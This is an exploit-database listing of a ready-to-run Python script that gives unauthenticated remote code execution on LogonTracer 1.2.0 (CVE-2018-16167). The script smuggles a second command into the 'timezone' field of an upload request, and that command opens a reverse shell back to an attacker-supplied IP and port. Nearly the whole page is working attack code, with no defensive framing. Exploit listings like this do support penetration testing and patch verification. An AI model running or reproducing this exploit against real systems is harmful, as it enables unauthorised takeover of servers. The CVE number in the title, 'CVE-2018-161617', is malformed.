Exploit for LogonTracer 1.2.0 Remote Code Execution CVE-2018-161617 CVE-2018-16167

Name: Exploit for LogonTracer 1.2.0 Remote Code Execution CVE-2018-161617 CVE-2018-16167
Rating: 5 (300 reviews)

2021-06-01 | CVSS 10.0

## https://sploitus.com/exploit?id=PACKETSTORM:162880
# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)  
# Date: 29/05/2021  
# Exploit Author: g0ldm45k  
# Vendor Homepage: https://www.jpcert.or.jp/  
# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0  
# Version: 1.2.0 and earlier  
# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)  
# CVE : CVE-2018-16167  
  
import requests  
import argparse  
  
parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')  
parser.add_argument('aip', type=str, help='Attacker ip')  
parser.add_argument('aport', type=str, help='Attacker port')  
parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')  
  
args = parser.parse_args()  
  
ATTACKER_IP = args.aip  
ATTACKER_PORT = args.aport  
PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"  
  
VICTIM_URL = args.victimurl  
VICTIM_ENDPOINT = "/upload"  
  
DATA = {  
"logtype": "XML",  
"timezone": f"1;{PAYLOAD};",  
}  
  
print("[!] Sending request... If your terminal hangs, you might have a shell!")  
requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)  
print("[*] Done. Did you get what you wanted?")